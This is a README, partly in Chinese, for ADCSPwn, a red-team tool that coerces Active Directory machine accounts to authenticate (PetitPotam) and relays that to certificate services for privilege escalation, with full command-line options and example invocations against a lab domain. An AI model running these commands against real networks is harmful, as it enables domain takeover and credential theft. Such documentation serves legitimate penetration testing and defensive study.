bats3c/ADCSPwn

# ADCSPwn 一种用于在 Active Directory 网络中提升权限的工具，通过强制机器账户进行身份验证 (Petitpotam) 并中继到证书服务来实现。 ## 用法 在目标网络中运行 `ADCSPwn`。 ``` Author: @_batsec_ - MDSec ActiveBreach Contributor: @Flangvik - TrustedSec Contributor: @424f424f - Black Hills Information Security adcspwn.exe --adcs --port [local port] --remote [computer] Required arguments: adcs - This is the address of the AD CS server which authentication will be relayed to. Optional arguments: secure - Use HTTPS with the certificate service. port - The port ADCSPwn will listen on. remote - Remote machine to trigger authentication from. username - Username for non-domain context. password - Password for non-domain context. dc - Domain controller to query for Certificate Templates (LDAP). unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) . output - Output path to store base64 generated crt. Example usage: adcspwn.exe --adcs cs.pwnlab.local adcspwn.exe --adcs cs.pwnlab.local --secure adcspwn.exe --adcs cs.pwnlab.local --port 9001 adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001 adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --dc dc.pwnlab.local --unc \\WIN-WORK01.pwnlab.local\made\up\share ``` ## 致谢 - [@harmj0y](https://twitter.com/harmj0y) 和 [@tifkin_](https://twitter.com/tifkin_) 的 [whitepaper](https://specterops.io/assets/resources/Certified_Pre-Owned.pdf) 详细描述了此问题。 - [@topotam77](https://twitter.com/topotam77) 展示了如何滥用 `EfsRpcOpenFileRaw`。

标签：Active Directory, AD CS, Checkov, Conpot, log2timeline, Modbus, Plaso, Shellcode检测, Terraform 安全, Windows安全, 协议分析, 域渗透, 多人体追踪, 恶意软件收集, 权限提升, 横向移动, 电子数据取证, 编程规范, 证书服务, 超级时间线